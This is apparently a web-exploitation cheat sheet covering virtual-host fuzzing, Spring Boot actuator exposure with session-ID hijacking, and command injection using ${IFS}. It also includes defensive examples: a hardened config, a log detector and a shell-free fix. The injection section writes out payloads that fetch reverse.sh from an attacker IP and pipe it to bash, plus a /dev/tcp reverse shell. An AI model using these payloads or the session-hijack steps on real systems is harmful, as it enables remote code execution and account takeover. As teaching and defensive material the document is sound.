# Web-Exploitation

  • robots.txt
  • sitemap.xml

## Virtual host fuzzing

```bash
# Command: ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949
```

## Spring Boot framework

### Detect Spring Boot framework

Request a random page that does not exist, for example /qmdkgjrot12dfgg. If the error page returns "Whitelabel Error Page", the Spring Boot framework is in use.

### Known misconfigured endpoints

| Endpoint | Description |
| --- | --- |
| /actuator | |
| /actuator/sessions | Lists all active sessions and their session IDs |
| /actuator/beans | |
| /actuator/health | |
| /actuator/env | |
| /actuator/mappings | Gives a detailed overview of all the request mappings configured in the application. Browsing to the endpoint returns a JSON response describing each mapping, including its HTTP methods (GET, POST, etc.) |
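The configuration behind the table above, added here as an example and not part of the original README: a Spring Boot `application.properties` fragment showing the exposure setting that makes these endpoints reachable beside a restricted one. The `management.*` keys are real Spring Boot properties; the separate management port is an assumption for the example. Note that `/actuator/sessions` only exists when Spring Session is on the classpath, and `exclude` takes precedence over `include`, so the excluded endpoints stay off the web even if `include` is widened later.

```properties
# Weak: every actuator endpoint is served over HTTP, which is what makes
# /actuator/sessions, /actuator/env, /actuator/beans and /actuator/mappings reachable.
# management.endpoints.web.exposure.include=*

# Corrected: expose only what monitoring needs and keep the sensitive ones off the web.
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=env,beans,mappings,sessions
# Do not leak component details (database names, disk paths) through the health page.
management.endpoint.health.show-details=never
# Serve the actuator on its own port so the reverse proxy never forwards it (assumed port).
management.server.port=8081
```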

### Brute-force well-known misconfigured Spring Boot endpoints

Known specific wordlist: `/usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt`

```bash
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10
```
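The detection side of the two procedures above (Host-header fuzzing and probing for open actuator endpoints), as an added example that is not part of the original README. It runs over constructed access-log lines; the log format (nginx "combined" with `$host` appended), the client addresses, the five-distinct-hosts threshold and the `/actuator/health` allowlist are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample access log lines (not taken from the page). Assumed format: nginx
# "combined" with the Host header appended as a final quoted field, i.e.
#   log_format vhost '$remote_addr - $remote_user [$time_local] "$request" '
#                    '$status $body_bytes_sent "$http_referer" "$http_user_agent" "$host"';
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 15949 "-" "curl/8.0.1" "www.mywebsite.fr"
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 15949 "-" "curl/8.0.1" "mail.mywebsite.fr"
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 15949 "-" "curl/8.0.1" "dev.mywebsite.fr"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 15949 "-" "curl/8.0.1" "test.mywebsite.fr"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 15949 "-" "curl/8.0.1" "staging.mywebsite.fr"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 4210 "-" "curl/8.0.1" "admin.mywebsite.fr"
198.51.100.9 - - [01/Jan/2024:10:05:10 +0000] "GET /actuator/sessions HTTP/1.1" 200 812 "-" "Mozilla/5.0" "mywebsite.fr"
198.51.100.9 - - [01/Jan/2024:10:05:12 +0000] "GET /actuator/env HTTP/1.1" 200 6144 "-" "Mozilla/5.0" "mywebsite.fr"
192.0.2.4 - - [01/Jan/2024:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 15949 "-" "Mozilla/5.0" "mywebsite.fr"
192.0.2.4 - - [01/Jan/2024:10:07:01 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27" "mywebsite.fr"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<host>[^"]*)"$'
)

# Actuator paths that are expected to be reachable (health probes); an assumption for this demo.
EXPECTED_ACTUATOR_PATHS = frozenset({"/actuator/health"})


def parse_log(text: str) -> list[dict]:
    """Parse each non-empty line into a dict of named fields; an unparsable line raises."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        match = LOG_RE.match(line)
        if match is None:
            raise ValueError(f"unparsable log line: {line!r}")
        records.append(match.groupdict())
    return records


def find_actuator_requests(records, allowed=EXPECTED_ACTUATOR_PATHS):
    """Return (client_ip, path) for every request to an actuator endpoint that is not in
    the allowed set; these are the endpoints the table above says should not be open."""
    hits = []
    for rec in records:
        path = rec["path"].split("?", 1)[0].rstrip("/") or "/"
        if (path == "/actuator" or path.startswith("/actuator/")) and path not in allowed:
            hits.append((rec["ip"], path))
    return hits


def find_vhost_enumeration(records, min_distinct_hosts=5):
    """Return {client_ip: distinct Host count} for clients that sent at least
    min_distinct_hosts different Host headers: the signature of Host-header fuzzing,
    where the same path is requested again and again with a changing Host value."""
    hosts_by_ip = defaultdict(set)
    for rec in records:
        hosts_by_ip[rec["ip"]].add(rec["host"].lower())
    return {ip: len(hosts) for ip, hosts in hosts_by_ip.items() if len(hosts) >= min_distinct_hosts}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for ip, path in find_actuator_requests(recs):
        print(f"ALERT actuator endpoint requested: {ip} -> {path}")
    for ip, count in find_vhost_enumeration(recs).items():
        print(f"ALERT possible vhost enumeration: {ip} used {count} distinct Host headers")
```

On the sample, the fuzzing client is the one whose Host values change while the request line stays identical, and the actuator alert fires for `/actuator/sessions` and `/actuator/env` but not for the health probe. In production the same logic wants a time window and a per-client rate rather than a flat count.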

### Exploit /actuator/sessions

We see the session identifier, which we can copy and set as a cookie in our browser using the developer console's Storage tab.

Important note: Firefox sometimes does not allow adding the value directly under Cookies; in that case, add it under Local Storage or Session Storage instead. Also remember to name the entry JSESSIONID.

Once the session identifier is in place, try to access authenticated-user or admin pages (e.g. /admin, /console, etc.).

Important note: Sometimes the session identifier has expired. In that case, reload the /actuator/sessions page, take a fresh session identifier and replace the old one in the developer console's Storage tab.

## Command injection

Often the injectable field does not accept whitespace. To get around this, ${IFS} can be used as a delimiter: IFS is a special shell variable (Internal Field Separator) whose default value in shells like Bash and sh is a space followed by a tab and a newline, so an unquoted ${IFS} is word-split exactly like a space.

Example of command injection using ${IFS} as a delimiter:

```bash
# Remember to start 'python -m http.server 4444' on the attacker side first

test;curl${IFS}http://10.0.0.1:4444;                   # tries to connect to the attacker server
test;curl${IFS}http://10.10.0.1:4444/reverse.sh|bash;  # connects to the attacker server, downloads a reverse shell (reverse.sh) and executes it with bash

# Example of reverse shell generation in the shell
# echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh
```
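Why the ${IFS} trick works and what actually stops it, as an added example that is not part of the original README: a Python snippet that builds the command the way a vulnerable application does (string concatenation handed to a shell), the space-only blocklist the payload defeats, and the hardened form (allowlist validation plus an argv list with no shell). The `ping` command, the hostname regex and the sample inputs are assumptions made for the example.

```python
import re
import subprocess
import sys

# Constructed inputs (not from the page's target): a benign hostname and a payload
# shaped like the page's ${IFS} example.
BENIGN_HOST = "example.org"
IFS_PAYLOAD = "test;curl${IFS}http://10.0.0.1:4444;"

# Hostname allowlist (RFC 1123 style): labels of letters, digits and hyphens joined by dots.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def vulnerable_command(host: str) -> str:
    """How the vulnerable application builds its command: string concatenation that is
    then handed to a shell (os.system / subprocess.run(..., shell=True)). The shell
    parses ';' as a command separator and expands ${IFS} into whitespace."""
    return f"ping -c 1 {host}"


def naive_space_filter(host: str) -> bool:
    """The blocklist the ${IFS} trick defeats: it only rejects literal spaces.
    Returns True when the value is accepted (i.e. the payload sails through)."""
    return " " not in host


def is_valid_host(host: str) -> bool:
    """Allowlist validation: only a well-formed hostname passes; ';', '$', '{', '/' cannot."""
    return HOST_RE.match(host) is not None


def build_argv(host: str) -> list[str]:
    """Hardened form: validate against the allowlist and build an argv list, so no shell
    ever parses the value. Raises ValueError on anything that is not a hostname."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def argv_is_literal(value: str) -> str:
    """Show that with an argv list (shell=False) the value reaches the child process as one
    literal argument: ';' does not split it and ${IFS} is not expanded. The Python
    interpreter is used as the child so the demo runs anywhere, with no network access."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    print("naive filter accepts payload:", naive_space_filter(IFS_PAYLOAD))  # True
    print("shell would parse:", vulnerable_command(IFS_PAYLOAD))             # two commands
    print("argv child received:", argv_is_literal(IFS_PAYLOAD))             # unchanged string
    print("hardened argv:", build_argv(BENIGN_HOST))
    try:
        build_argv(IFS_PAYLOAD)
    except ValueError as exc:
        print("hardened rejects:", exc)
```

The point of `argv_is_literal` is that the fix is not a better blocklist: once the value is one element of an argv list, the separator and the variable expansion that the payload relies on never get interpreted, and the allowlist in `build_argv` then rejects the value before any process is started at all.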